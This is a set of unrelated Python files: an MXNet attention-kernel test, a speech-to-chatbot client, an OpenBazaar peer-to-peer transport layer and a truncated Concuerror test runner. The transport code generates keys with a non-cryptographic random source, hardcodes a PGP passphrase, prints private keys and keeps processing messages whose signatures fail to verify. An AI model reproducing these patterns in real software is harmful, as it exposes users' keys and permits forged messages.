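#   0 0 0 1 1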
for i in range(seq_length):
end = (i + 1 + w * d) if symmetric else (i + 1)
for j in range(i - w * d, end, d):
if j >= 0 and j < seq_length:
mask_np[:, :, i, j] = 1
return mask_np
def test_sldwin_atten_op_impl(batch_size, seq_length, num_heads,
num_head_units, w, symmetric, d):
# Generate the data
query = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
key = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
value = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
valid_length = np.zeros((batch_size,))
valid_length[:] = seq_length
query = mx.np.array(query, dtype=np.float32)
key = mx.np.array(key, dtype=np.float32)
value = mx.np.array(value, dtype=np.float32)
dilation = mx.np.ones((num_heads,), dtype=np.int32)
dilation[:] = d
valid_length = mx.np.array(valid_length, dtype=np.int32)
query.attach_grad()
key.attach_grad()
value.attach_grad()
with mx.autograd.record():
score = mx.npx.sldwin_atten_score(query, key, dilation,
w=w, symmetric=symmetric)
mask = mx.npx.sldwin_atten_mask_like(score, dilation, valid_length,
w=w, symmetric=symmetric)
score = score * mask
out = mx.npx.sldwin_atten_context(score, value, dilation,
w=w, symmetric=symmetric)
out.backward()
out_np = out.asnumpy()
grad_query = query.grad.asnumpy()
grad_key = key.grad.asnumpy()
grad_value = value.grad.asnumpy()
query.grad[:] = 0
key.grad[:] = 0
value.grad[:] = 0
mask_np = gen_sliding_window_mask_full(batch_size, num_heads, seq_length,
w, symmetric, d)
mask = mx.np.array(mask_np, dtype=np.float32)
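# Reference path: materialize the full (seq_length x seq_length) mask and use
# dense batch_dot attention; it should agree with the banded sldwin_atten_*
# kernels above to within the tolerances checked at the end.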
with mx.autograd.record():
score = mx.npx.batch_dot(mx.np.swapaxes(query, 1, 2),
mx.np.swapaxes(key, 1, 2),
transpose_b=True)
score = score * mask
out = mx.npx.batch_dot(score,
mx.np.swapaxes(value, 1, 2)).transpose((0, 2, 1, 3))
out.backward()
out_np_gt = out.asnumpy()
grad_query_gt = query.grad.asnumpy()
grad_key_gt = key.grad.asnumpy()
grad_value_gt = value.grad.asnumpy()
assert_allclose(out_np_gt, out_np, 1E-3, 1E-3)
assert_allclose(grad_query_gt, grad_query, 1E-3, 1E-3)
assert_allclose(grad_key_gt, grad_key, 1E-3, 1E-3)
assert_allclose(grad_value_gt, grad_value, 1E-3, 1E-3)
for symmetric in [True, False]:
for d in [1, 2, 3]:
test_sldwin_atten_op_impl(2, 128, 2, 8, 16, symmetric, d)
test_sldwin_atten_op_impl(1, 8, 2, 4, 2, symmetric, d)
def test_zero_sized_dim():
mx.util.set_np_shape(True) # Must be done to prevent zero-sized dimension conversion to 'unknown'
def seq_last():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18938"""
data = mx.nd.array(np.random.rand(1, 0, 0))
res = mx.nd.op.SequenceLast(data)
assert data.shape[1:] == res.shape
def seq_mask():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18939"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceMask(data)
assert data.shape == res.shape
def seq_reverse():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18940"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceReverse(data)
assert data.shape == res.shape
seq_last()
seq_reverse()
seq_mask()
|
client.py
|
import requests
import json
import threading
import speech_recognition as sr
import logging
from flask import Flask, request
from speech_handling.text_to_speech import SapiTTS, GoogleTTS
logger = logging.getLogger(__name__)
app = Flask(__name__)
tts = GoogleTTS()
recognizer = sr.Recognizer()
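# Rough flow (as I read this client): speech_to_text() records from the
# microphone, transcribes it with the Google recognizer and POSTs the text to
# the bot's voice-channel webhook, while the Flask route below receives the
# bot's replies; the ngrok URL is whatever tunnel the bot is exposed on.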
def send_message_to_voice_channel(message):
# encoded_query = quote(query)
print(f'sending message {message}')
url = "http://5fb525f4.ngrok.io/app/message"
data = {"sender": "user", "message": message}
data_json = json.dumps(data)
headers = {'Content-Type': 'application/json'}
requests.post(
url=url,
data=data_json,
headers=headers
)
def speech_to_text():
with sr.Microphone() as source:
print('Listening...')
# increase threshold if stt tries to recognize for too long
recognizer.energy_threshold = 1000
recognizer.adjust_for_ambient_noise(source)
audio = recognizer.listen(source)
try:
message = recognizer.recognize_google(audio, language="de-DE")
print(f'Deine Eingabe: {message}')
send_message_to_voice_channel(message)
except sr.UnknownValueError:
tts.utter_voice_message("Ich habe dich leider nicht verstanden")
logger.warning("Could not understand audio")
except sr.RequestError as e:
logger.error(f"Error: {e}")
def command_line_input():
message = input("User: ")
send_message_to_voice_channel(message)
@app.route("/", methods=['POST'])
def receive_bot_response():
payload = request.json
message = payload.get("message", None)
print(f'Bot: {message}')
return "success", 200
thread = threading.Thread(target=app.run)
thread.start()
send_message_to_voice_channel('/start')
while True:
speech_to_text()
|
transport.py
|
import connection
from dht import DHT
from protocol import hello_request
from protocol import hello_response
from protocol import goodbye
from protocol import proto_response_pubkey
from urlparse import urlparse
from zmq.eventloop import ioloop, zmqstream
from zmq.eventloop.ioloop import PeriodicCallback
from collections import defaultdict
from pprint import pformat
from pybitcointools.main import privkey_to_pubkey
from pybitcointools.main import privtopub
from pybitcointools.main import random_key
from crypto_util import pubkey_to_pyelliptic
from crypto_util import makePrivCryptor
from crypto_util import makePubCryptor
from pysqlcipher.dbapi2 import OperationalError, DatabaseError
import gnupg
import xmlrpclib
import logging
import pyelliptic as ec
import requests
import json
import socket
import traceback
from threading import Thread
import zlib
import obelisk
import network_util
import zmq
import random
import hashlib
ioloop.install()
class TransportLayer(object):
# Transport layer manages a list of peers
def __init__(self, market_id, my_ip, my_port, my_guid, nickname=None):
self.peers = {}
self.callbacks = defaultdict(list)
self.timeouts = []
self.port = my_port
self.ip = my_ip
self.guid = my_guid
self.market_id = market_id
self.nickname = nickname
self.handler = None
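# socket.inet_pton(AF_INET6, ...) only succeeds for a literal IPv6 address,
# so the try/except below picks the bracketed tcp://[addr]:port form when
# needed and falls back to plain tcp://addr:port otherwise.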
try:
socket.inet_pton(socket.AF_INET6, my_ip)
my_uri = 'tcp://[%s]:%s' % (self.ip, self.port)
except (socket.error, ValueError):
my_uri = 'tcp://%s:%s' % (self.ip, self.port)
self.uri = my_uri
self.log = logging.getLogger(
'[%s] %s' % (market_id, self.__class__.__name__)
)
def add_callbacks(self, callbacks):
for section, callback in callbacks:
self.callbacks[section] = []
self.add_callback(section, callback)
def set_websocket_handler(self, handler):
self.handler = handler
def add_callback(self, section, callback):
if callback not in self.callbacks[section]:
self.callbacks[section].append(callback)
def trigger_callbacks(self, section, *data):
# Run all callbacks in specified section
for cb in self.callbacks[section]:
cb(*data)
# Run all callbacks registered under the 'all' section. Don't duplicate
# calls if the specified section was 'all'.
if not section == 'all':
for cb in self.callbacks['all']:
cb(*data)
def get_profile(self):
return hello_request({'uri': self.uri})
def listen(self, pubkey):
self.log.info("Listening at: %s:%s" % (self.ip, self.port))
self.ctx = zmq.Context()
self.socket = self.ctx.socket(zmq.REP)
if network_util.is_loopback_addr(self.ip):
try:
# we are in local test mode so bind that socket on the
# specified IP
self.socket.bind(self.uri)
except Exception as e:
error_message = "\n\nTransportLayer.listen() error!!!: "
error_message += "Could not bind socket to " + self.uri
error_message += " (" + str(e) + ")"
import platform
if platform.system() == 'Darwin':
error_message += "\n\nPerhaps you have not added a "\
"loopback alias yet.\n"
error_message += "Try this on your terminal and restart "\
"OpenBazaar in development mode again:\n"
error_message += "\n\t$ sudo ifconfig lo0 alias 127.0.0.2"
error_message += "\n\n"
raise Exception(error_message)
else:
try:
socket.inet_pton(socket.AF_INET6, self.ip)
self.socket.ipv6 = True
self.socket.bind('tcp://[*]:%s' % self.port)
except (AttributeError, socket.error, ValueError):
self.socket.bind('tcp://*:%s' % self.port)
self.stream = zmqstream.ZMQStream(
self.socket, io_loop=ioloop.IOLoop.current()
)
def handle_recv(message):
for msg in message:
self._on_raw_message(msg)
self.stream.send(
json.dumps({
'type': 'ok',
'senderGUID': self.guid,
'pubkey': pubkey,
'senderNick': self.nickname
})
)
self.stream.on_recv(handle_recv)
def closed(self, *args):
self.log.info("client left")
def _init_peer(self, msg):
uri = msg['uri']
if uri not in self.peers:
self.peers[uri] = connection.PeerConnection(self, uri)
def remove_peer(self, uri, guid):
self.log.info("Removing peer %s", uri)
ip = urlparse(uri).hostname
port = urlparse(uri).port
if (ip, port, guid) in self.shortlist:
self.shortlist.remove((ip, port, guid))
self.log.info('Removed')
# try:
# del self.peers[uri]
# msg = {
# 'type': 'peer_remove',
# 'uri': uri
# }
# self.trigger_callbacks(msg['type'], msg)
#
# except KeyError:
# self.log.info("Peer %s was already removed", uri)
def send(self, data, send_to=None, callback=lambda msg: None):
self.log.info("Outgoing Data: %s %s" % (data, send_to))
data['senderNick'] = self.nickname
# Directed message
if send_to is not None:
peer = self.dht.routingTable.getContact(send_to)
# self.log.debug(
# '%s %s %s' % (peer.guid, peer.address, peer.pub)
# )
peer.send(data, callback=callback)
return
else:
# FindKey and then send
for peer in self.dht.activePeers:
try:
data['senderGUID'] = self.guid
data['pubkey'] = self.pubkey
# if peer.pub:
# peer.send(data, callback)
# else:
print 'test %s' % peer
def cb(msg):
print msg
peer.send(data, cb)
except:
self.log.info("Error sending over peer!")
traceback.print_exc()
def broadcast_goodbye(self):
self.log.info("Broadcast goodbye")
msg = goodbye({'uri': self.uri})
self.send(msg)
def _on_message(self, msg):
# here goes the application callbacks
# we get a "clean" msg which is a dict holding whatever
self.log.info("[On Message] Data received: %s" % msg)
# if not self.routingTable.getContact(msg['senderGUID']):
# Add to contacts if doesn't exist yet
# self._addCryptoPeer(msg['uri'], msg['senderGUID'], msg['pubkey'])
if msg['type'] != 'ok':
self.trigger_callbacks(msg['type'], msg)
def _on_raw_message(self, serialized):
self.log.info("connected " + str(len(serialized)))
try:
msg = json.loads(serialized[0])
except:
self.log.info("incorrect msg! " + serialized)
return
msg_type = msg.get('type')
if msg_type == 'hello_request' and msg.get('uri'):
self._init_peer(msg)
else:
self._on_message(msg)
def valid_peer_uri(self, uri):
try:
[_, self_addr, _] = network_util.uri_parts(self.uri)
[other_protocol, other_addr, other_port] = \
network_util.uri_parts(uri)
except RuntimeError:
return False
if not network_util.is_valid_protocol(other_protocol) \
or not network_util.is_valid_port(other_port):
return False
if network_util.is_private_ip_address(self_addr):
if not network_util.is_private_ip_address(other_addr):
self.log.warning((
'Trying to connect to external '
'network with a private ip address.'
))
else:
if network_util.is_private_ip_address(other_addr):
return False
return True
def shutdown(self):
if self.ctx is not None:
print "TransportLayer.shutdown() destroying zmq ctx sockets."
self.ctx.destroy(linger=None)
class CryptoTransportLayer(TransportLayer):
def __init__(self, my_ip, my_port, market_id, db, bm_user=None, bm_pass=None,
bm_port=None, seed_mode=0, dev_mode=False, disable_ip_update=False):
self.log = logging.getLogger(
'[%s] %s' % (market_id, self.__class__.__name__)
)
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
# Connect to database
self.db = db
self.bitmessage_api = None
if (bm_user, bm_pass, bm_port) != (None, None, None):
if not self._connect_to_bitmessage(bm_user, bm_pass, bm_port):
self.log.info('Bitmessage not installed or started')
try:
socket.inet_pton(socket.AF_INET6, my_ip)
my_uri = "tcp://[%s]:%s" % (my_ip, my_port)
except (socket.error, ValueError):
my_uri = "tcp://%s:%s" % (my_ip, my_port)
self.market_id = market_id
self.nick_mapping = {}
self.uri = my_uri
self.ip = my_ip
self.nickname = ""
self._dev_mode = dev_mode
# Set up
self._setup_settings()
self.dht = DHT(self, self.market_id, self.settings, self.db)
# self._myself = ec.ECC(pubkey=self.pubkey.decode('hex'),
# privkey=self.secret.decode('hex'),
# curve='secp256k1')
TransportLayer.__init__(self, market_id, my_ip, my_port,
self.guid, self.nickname)
self.setup_callbacks()
self.listen(self.pubkey)
if seed_mode == 0 and not dev_mode and not disable_ip_update:
self.start_ip_address_checker()
def setup_callbacks(self):
self.add_callbacks([('hello', self._ping),
('findNode', self._find_node),
('findNodeResponse', self._find_node_response),
('store', self._store_value)])
def start_ip_address_checker(self):
'''Checks for possible public IP change'''
self.caller = PeriodicCallback(self._ip_updater_periodic_callback, 5000, ioloop.IOLoop.instance())
self.caller.start()
def _ip_updater_periodic_callback(self):
try:
r = requests.get('http://ipv4.icanhazip.com')
if r and hasattr(r, 'text'):
ip = r.text
ip = ip.strip(' \t\n\r')
if ip != self.ip:
self.ip = ip
try:
socket.inet_pton(socket.AF_INET6, self.ip)
my_uri = 'tcp://[%s]:%s' % (self.ip, self.port)
except (socket.error, ValueError):
my_uri = 'tcp://%s:%s' % (self.ip, self.port)
self.uri = my_uri
self.stream.close()
self.listen(self.pubkey)
self.dht._iterativeFind(self.guid, [], 'findNode')
else:
self.log.error('Could not get IP')
except Exception as e:
self.log.error('[Requests] error: %s' % e)
def save_peer_to_db(self, peer_tuple):
uri = peer_tuple[0]
pubkey = peer_tuple[1]
guid = peer_tuple[2]
nickname = peer_tuple[3]
# Update query
self.db.deleteEntries("peers", {"uri": uri, "guid": guid}, "OR")
# if len(results) > 0:
# self.db.updateEntries("peers", {"id": results[0]['id']}, {"market_id": self.market_id, "uri": uri, "pubkey": pubkey, "guid": guid, "nickname": nickname})
# else:
if guid is not None:
self.db.insertEntry("peers", {
"uri": uri,
"pubkey": pubkey,
"guid": guid,
"nickname": nickname,
"market_id": self.market_id
})
def _connect_to_bitmessage(self, bm_user, bm_pass, bm_port):
# Get bitmessage going
# First, try to find a local instance
result = False
try:
self.log.info('[_connect_to_bitmessage] Connecting to Bitmessage on port %s' % bm_port)
self.bitmessage_api = xmlrpclib.ServerProxy("http://{}:{}@localhost:{}/".format(bm_user, bm_pass, bm_port), verbose=0)
result = self.bitmessage_api.add(2, 3)
self.log.info("[_connect_to_bitmessage] Bitmessage API is live: %s", result)
# If we failed, fall back to starting our own
except Exception as e:
self.log.info("Failed to connect to bitmessage instance: {}".format(e))
self.bitmessage_api = None
# self._log.info("Spawning internal bitmessage instance")
# # Add bitmessage submodule path
# sys.path.insert(0, os.path.join(
# os.path.dirname(__file__), '..', 'pybitmessage', 'src'))
# import bitmessagemain as bitmessage
# bitmessage.logger.setLevel(logging.WARNING)
# bitmessage_instance = bitmessage.Main()
# bitmessage_instance.start(daemon=True)
# bminfo = bitmessage_instance.getApiAddress()
# if bminfo is not None:
# self._log.info("Started bitmessage daemon at %s:%s".format(
# bminfo['address'], bminfo['port']))
# bitmessage_api = xmlrpclib.ServerProxy("http://{}:{}@{}:{}/".format(
# bm_user, bm_pass, bminfo['address'], bminfo['port']))
# else:
# self._log.info("Failed to start bitmessage dameon")
# self._bitmessage_api = None
return result
def _checkok(self, msg):
self.log.info('Check ok')
def get_guid(self):
return self.guid
def get_dht(self):
return self.dht
def get_bitmessage_api(self):
return self.bitmessage_api
def get_market_id(self):
return self.market_id
# def get_myself(self):
# return self._myself
def _ping(self, msg):
self.log.info('Pinged %s ' % json.dumps(msg, ensure_ascii=False))
#
# pinger = CryptoPeerConnection(self, msg['uri'], msg['pubkey'], msg['senderGUID'])
# pinger.send_raw(json.dumps(
# {"type": "hello_response",
# "senderGUID": self.guid,
# "uri": self.uri,
# "senderNick": self.nickname,
# "pubkey": self.pubkey,
# }))
def _store_value(self, msg):
self.dht._on_storeValue(msg)
def _find_node(self, msg):
self.dht.on_find_node(msg)
def _find_node_response(self, msg):
self.dht.on_findNodeResponse(self, msg)
def _setup_settings(self):
try:
self.settings = self.db.selectEntries("settings", {"market_id": self.market_id})
except (OperationalError, DatabaseError) as e:
print e
raise SystemExit("database file %s corrupt or empty - cannot continue" % self.db.db_path)
if len(self.settings) == 0:
self.settings = {"market_id": self.market_id, "welcome": "enable"}
self.db.insertEntry("settings", self.settings)
else:
self.settings = self.settings[0]
# Generate PGP key during initial setup or if previous PGP gen failed
if not ('PGPPubKey' in self.settings and self.settings["PGPPubKey"]):
try:
self.log.info('Generating PGP keypair. This may take several minutes...')
print 'Generating PGP keypair. This may take several minutes...'
gpg = gnupg.GPG()
input_data = gpg.gen_key_input(key_type="RSA",
key_length=2048,
name_email='[email protected]',
name_comment="Autogenerated by Open Bazaar",
passphrase="P@ssw0rd")
assert input_data is not None
key = gpg.gen_key(input_data)
assert key is not None
pubkey_text = gpg.export_keys(key.fingerprint)
newsettings = {"PGPPubKey": pubkey_text, "PGPPubkeyFingerprint": key.fingerprint}
self.db.updateEntries("settings", {"market_id": self.market_id}, newsettings)
self.settings.update(newsettings)
self.log.info('PGP keypair generated.')
except Exception as e:
self.log.error("Encountered a problem with GPG: %s" % e)
raise SystemExit("Encountered a problem with GPG: %s" % e)
if not ('pubkey' in self.settings and self.settings['pubkey']):
# Generate Bitcoin keypair
self._generate_new_keypair()
if not ('nickname' in self.settings and self.settings['nickname']):
newsettings = {'nickname': 'Default'}
self.db.updateEntries('settings', {"market_id": self.market_id}, newsettings)
self.settings.update(newsettings)
self.nickname = self.settings['nickname'] if 'nickname' in self.settings else ""
self.secret = self.settings['secret'] if 'secret' in self.settings else ""
self.pubkey = self.settings['pubkey'] if 'pubkey' in self.settings else ""
self.privkey = self.settings.get('privkey')
self.btc_pubkey = privkey_to_pubkey(self.privkey)
self.guid = self.settings['guid'] if 'guid' in self.settings else ""
self.sin = self.settings['sin'] if 'sin' in self.settings else ""
self.bitmessage = self.settings['bitmessage'] if 'bitmessage' in self.settings else ""
if not ('bitmessage' in self.settings and self.settings['bitmessage']):
# Generate Bitmessage address
if self.bitmessage_api is not None:
self._generate_new_bitmessage_address()
self._myself = ec.ECC(
pubkey=pubkey_to_pyelliptic(self.pubkey).decode('hex'),
raw_privkey=self.secret.decode('hex'),
curve='secp256k1'
)
self.log.debug('Retrieved Settings: \n%s', pformat(self.settings))
def _generate_new_keypair(self):
secret = str(random.randrange(2 ** 256))
self.secret = hashlib.sha256(secret).hexdigest()
self.pubkey = privtopub(self.secret)
self.privkey = random_key()
print 'PRIVATE KEY: ', self.privkey
self.btc_pubkey = privtopub(self.privkey)
print 'PUBLIC KEY: ', self.btc_pubkey
# Generate SIN
sha_hash = hashlib.sha256()
sha_hash.update(self.pubkey)
ripe_hash = hashlib.new('ripemd160')
ripe_hash.update(sha_hash.digest())
self.guid = ripe_hash.digest().encode('hex')
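# The GUID is RIPEMD160(SHA256(pubkey)) hex-encoded; the SIN below wraps the
# same hash in a Base58Check encoding with a \x0F\x02 prefix (a BitPay-style
# SIN, as far as I can tell).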
self.sin = obelisk.EncodeBase58Check('\x0F\x02%s' % ripe_hash.digest())
newsettings = {
"secret": self.secret,
"pubkey": self.pubkey,
"privkey": self.privkey,
"guid": self.guid,
"sin": self.sin
}
self.db.updateEntries("settings", {"market_id": self.market_id}, newsettings)
self.settings.update(newsettings)
def _generate_new_bitmessage_address(self):
# Use the guid generated previously as the key
self.bitmessage = self.bitmessage_api.createRandomAddress(
self.guid.encode('base64'),
False,
1.05,
1.1111
)
newsettings = {"bitmessage": self.bitmessage}
self.db.updateEntries("settings", {"market_id": self.market_id}, newsettings)
self.settings.update(newsettings)
def join_network(self, seed_peers=None, callback=lambda msg: None):
if seed_peers is None:
seed_peers = []
self.log.info('Joining network')
known_peers = []
# Connect up through seed servers
for idx, seed in enumerate(seed_peers):
try:
socket.inet_pton(socket.AF_INET6, seed)
seed_peers[idx] = "tcp://[%s]:12345" % seed
except (socket.error, ValueError):
seed_peers[idx] = "tcp://%s:12345" % seed
# Connect to persisted peers
db_peers = self.get_past_peers()
known_peers = list(set(seed_peers)) + list(set(db_peers))
self.connect_to_peers(known_peers)
# TODO: This needs rethinking. Normally we can search for ourselves
# but because we are not connected to them quick enough this
# will always fail. Need @gubatron to review
# Populate routing table by searching for self
# if len(known_peers) > 0:
# self.search_for_my_node()
if callback is not None:
callback('Joined')
def get_past_peers(self):
peers = []
result = self.db.selectEntries("peers", {"market_id": self.market_id})
for peer in result:
peers.append(peer['uri'])
return peers
def search_for_my_node(self):
print 'Searching for myself'
self.dht._iterativeFind(self.guid, self.dht.knownNodes, 'findNode')
def connect_to_peers(self, known_peers):
for known_peer in known_peers:
t = Thread(target=self.dht.add_peer, args=(self, known_peer,))
t.start()
def get_crypto_peer(self, guid=None, uri=None, pubkey=None, nickname=None,
callback=None):
if guid == self.guid:
self.log.error('Cannot get CryptoPeerConnection for your own node')
return
self.log.debug('Getting CryptoPeerConnection' +
'\nGUID:%s\nURI:%s\nPubkey:%s\nNickname:%s' %
(guid, uri, pubkey, nickname))
return connection.CryptoPeerConnection(self,
uri,
pubkey,
guid=guid,
nickname=nickname)
def addCryptoPeer(self, peer_to_add):
foundOutdatedPeer = False
for idx, peer in enumerate(self.dht.activePeers):
if (peer.address, peer.guid, peer.pub) == \
(peer_to_add.address, peer_to_add.guid, peer_to_add.pub):
self.log.info('Found existing peer, not adding.')
return
if peer.guid == peer_to_add.guid or \
peer.pub == peer_to_add.pub or \
peer.address == peer_to_add.address:
foundOutdatedPeer = True
self.log.info('Found an outdated peer')
# Update existing peer
self.dht.activePeers[idx] = peer_to_add
self.dht.add_peer(self,
peer_to_add.address,
peer_to_add.pub,
peer_to_add.guid,
peer_to_add.nickname)
if not foundOutdatedPeer and peer_to_add.guid != self.guid:
self.log.info('Adding crypto peer at %s' % peer_to_add.nickname)
self.dht.add_peer(self,
peer_to_add.address,
peer_to_add.pub,
peer_to_add.guid,
peer_to_add.nickname)
def get_profile(self):
peers = {}
self.settings = self.db.selectEntries("settings", {"market_id": self.market_id})[0]
for uri, peer in self.peers.iteritems():
if peer.pub:
peers[uri] = peer.pub.encode('hex')
return {'uri': self.uri,
'pub': self._myself.get_pubkey().encode('hex'),
'nickname': self.nickname,
'peers': peers}
def respond_pubkey_if_mine(self, nickname, ident_pubkey):
if ident_pubkey != self.pubkey:
self.log.info("Public key does not match your identity")
return
# Return signed pubkey
pubkey = self._myself.pubkey
ec_key = obelisk.EllipticCurveKey()
ec_key.set_secret(self.secret)
digest = obelisk.Hash(pubkey)
signature = ec_key.sign(digest)
# Send array of nickname, pubkey, signature to transport layer
self.send(proto_response_pubkey(nickname, pubkey, signature))
def pubkey_exists(self, pub):
for peer in self.peers.itervalues():
self.log.info(
'PEER: %s Pub: %s' % (
peer.pub.encode('hex'), pub.encode('hex')
)
)
if peer.pub.encode('hex') == pub.encode('hex'):
return True
return False
def create_peer(self, uri, pub, node_guid):
if pub:
pub = pub.decode('hex')
# Create the peer if public key is not already in the peer list
# if not self.pubkey_exists(pub):
self.peers[uri] = connection.CryptoPeerConnection(self, uri, pub, node_guid)
# Call 'peer' callbacks on listeners
self.trigger_callbacks('peer', self.peers[uri])
# else:
# print 'Pub Key is already in peer list'
def send(self, data, send_to=None, callback=lambda msg: None):
self.log.debug("Outgoing Data: %s %s" % (data, send_to))
# Directed message
if send_to is not None:
peer = self.dht.routingTable.getContact(send_to)
if not peer:
for activePeer in self.dht.activePeers:
if activePeer.guid == send_to:
peer = activePeer
break
# peer = CryptoPeerConnection(msg['uri'])
if peer:
self.log.debug('Directed Data (%s): %s' % (send_to, data))
try:
peer.send(data, callback=callback)
except Exception as e:
self.log.error('Not sending message directly to peer %s' % e)
else:
self.log.error('No peer found')
else:
# FindKey and then send
for peer in self.dht.activePeers:
try:
peer = self.dht.routingTable.getContact(peer.guid)
data['senderGUID'] = self.guid
data['pubkey'] = self.pubkey
def cb(msg):
self.log.debug('Message Back: \n%s' % pformat(msg))
peer.send(data, cb)
except:
self.log.info("Error sending over peer!")
traceback.print_exc()
def send_enc(self, uri, msg):
peer = self.peers[uri]
pub = peer.pub
# Now send a hello message to the peer
if pub:
self.log.info(
"Sending encrypted [%s] message to %s" % (
msg['type'], uri
)
)
peer.send(msg)
else:
# Will send clear profile on initial if no pub
self.log.info(
"Sending unencrypted [%s] message to %s" % (
msg['type'], uri
)
)
self.peers[uri].send_raw(json.dumps(msg))
def _init_peer(self, msg):
uri = msg['uri']
pub = msg.get('pub')
nickname = msg.get('nickname')
msg_type = msg.get('type')
guid = msg['guid']
if not self.valid_peer_uri(uri):
self.log.error("Invalid Peer: %s " % uri)
return
if uri not in self.peers:
# Unknown peer
self.log.info('Add New Peer: %s' % uri)
self.create_peer(uri, pub, guid)
if not msg_type:
self.send_enc(uri, hello_request(self.get_profile()))
elif msg_type == 'hello_request':
self.send_enc(uri, hello_response(self.get_profile()))
else:
# Known peer
if pub:
# test if we have to update the pubkey
if not self.peers[uri].pub:
self.log.info("Setting public key for seed node")
self.peers[uri].pub = pub.decode('hex')
self.trigger_callbacks('peer', self.peers[uri])
if self.peers[uri].pub != pub.decode('hex'):
self.log.info("Updating public key for node")
self.peers[uri].nickname = nickname
self.peers[uri].pub = pub.decode('hex')
self.trigger_callbacks('peer', self.peers[uri])
if msg_type == 'hello_request':
# reply only if necessary
self.send_enc(uri, hello_response(self.get_profile()))
def _on_message(self, msg):
# here goes the application callbacks
# we get a "clean" msg which is a dict holding whatever
# self.log.info("[On Message] Data received: %s" % msg)
pubkey = msg.get('pubkey')
uri = msg.get('uri')
ip = urlparse(uri).hostname
port = urlparse(uri).port
guid = msg.get('senderGUID')
nickname = msg.get('senderNick')[:120]
self.dht.add_known_node((ip, port, guid, nickname))
self.log.info('On Message: %s' % json.dumps(msg, ensure_ascii=False))
self.dht.add_peer(self, uri, pubkey, guid, nickname)
t = Thread(target=self.trigger_callbacks, args=(msg['type'], msg,))
t.start()
def _on_raw_message(self, serialized):
try:
# Decompress message
serialized = zlib.decompress(serialized)
msg = json.loads(serialized)
self.log.info("Message Received [%s]" % msg.get('type', 'unknown'))
if msg.get('type') is None:
data = msg.get('data').decode('hex')
sig = msg.get('sig').decode('hex')
try:
cryptor = makePrivCryptor(self.secret)
try:
data = cryptor.decrypt(data)
except Exception as e:
self.log.info('Exception: %s' % e)
self.log.debug('Signature: %s' % sig.encode('hex'))
self.log.debug('Signed Data: %s' % data)
# Check signature
data_json = json.loads(data)
sigCryptor = makePubCryptor(data_json['pubkey'])
if sigCryptor.verify(sig, data):
self.log.info('Verified')
else:
self.log.error('Message signature could not be verified %s' % msg)
# return
msg = json.loads(data)
self.log.debug('Message Data %s ' % msg)
except Exception as e:
self.log.error('Could not decrypt message properly %s' % e)
except ValueError:
try:
# Encrypted?
try:
msg = self._myself.decrypt(serialized)
msg = json.loads(msg)
self.log.info(
"Decrypted Message [%s]" % msg.get('type', 'unknown')
)
except:
self.log.error("Could not decrypt message: %s" % msg)
return
except:
self.log.error('Message probably sent using incorrect pubkey')
return
if msg.get('type') is not None:
self._on_message(msg)
else:
self.log.error('Received a message with no type')
def shutdown(self):
print "CryptoTransportLayer.shutdown()!"
try:
TransportLayer.shutdown(self)
print "CryptoTransportLayer.shutdown(): ZMQ sockets destroyed."
except Exception as e:
self.log.error("Transport shutdown error: " + e.message)
print "Notice: explicit DHT Shutdown not implemented."
try:
self.bitmessage_api.close()
except Exception as e:
# might not even be open, not much more we can do on our way out if exception thrown here.
self.log.error("Could not shutdown bitmessage_api's ServerProxy. " + e.message)
|
runtests.py
|
#!/usr/bin/env python
import os
import re
import sys
import glob
import subprocess
from ctypes import c_int
from multiprocessing import Process, Lock, Value, BoundedSemaphore, cpu_count
#---------------------------------------------------------------------
# Extract scenarios from the specified test
def runTest(test):
global dirname
global results
global sema1
# test has the format of '.*/suites/<suite_name>/src/<test_name>(.erl)?'
# Split the test in suite and name components using pattern matching
rest1, name = os.path.split(test)
rest2 = os.path.split(rest1)[0]
suite = os.path.split(rest2)[1]
name = os.path.splitext(name)[0]
if os.path.isdir(test):
# Our test is a multi module directory
dirn = test # directory
modn = "test" # module name
files = glob.glob(dirn + "/*.erl")
else:
dirn = rest1
modn = name
files = [test]
# Create a dir to save the results
try:
os.makedirs(results + "/" + suite + "/results")
except OSError:
pass
# Compile it
os.system("erlc -W0 -o %s %s/%s.erl" % (dirn, dirn, modn))
# And extract scenarios from it
pout = subprocess.check_output(
["erl -boot start_clean -noinput -pa %s -pa %s -s scenarios extract %s -s init stop"
% (dirname, dirn, modn)], shell=True).splitlines()
procS = []
for scenario in pout:
# scenario has the format of {<mod_name>,<func_name>,<preb>[,<flag>...]}\n
scen = scenario.strip("{}").split(",")
# And run the test
p = Process(
target=runScenario,
args=(suite, name, modn, scen[1], scen[2], scen[3:], files))
sema.acquire()
p.start()
procS.append(p)
# Wait
for p in procS:
p.join()
# Must happen late, in case the test has/needs an 'exceptional' results check that loads this beam
os.remove("%s/%s.beam" % (dirn,modn))
sema1.release()
#---------------------------------------------------------------------
# Run the specified scenario and print the results
def runScenario(suite, name, modn, funn, preb, flags, files):
global concuerror
global results
global dirname
global sema
global lock
global total_tests
global total_failed
if "dpor" in flags:
dpor_flag = "--dpor=optimal"
file_ext = "-dpor"
dpor_output = ""
elif "optimal" in flags:
dpor_flag = "--dpor=optimal"
file_ext = "-optimal"
dpor_output = ""
elif "source" in flags:
dpor_flag = "--dpor=source"
file_ext = "-source"
dpor_output = "source"
elif "persistent" in flags:
dpor_flag = "--dpor=persistent"
file_ext = "-persistent"
dpor_output = "persistent"
else:
dpor_flag = "--dpor=none"
file_ext = "-nodpor"
dpor_output = "disabled"
if preb == "inf":
bound = ""
bound_type = ""
preb_output = ""
else:
bound = ("-b %s") % (preb)
if "bpor" in flags:
bound_type = "-c bpor"
preb_output=("%s/bpor") % (preb)
preb=("%s-bpor") % (preb)
else:
bound_type = "-c delay"
preb_output=("%s/delay") % (preb)
if funn == modn:
funn_output = ""
else:
funn_output = funn
txtname = "%s-%s-%s%s.txt" % (name, funn, preb, file_ext)
rslt = "%s/%s/results/%s" % (results, suite, txtname)
try:
os.remove(rslt)
except OSError:
pass
# Run concuerror
status = os.system(
("%s -kq --assume_racing false"
" %s -f %s"
" --output %s"
" -m %s -t %s %s %s"
)
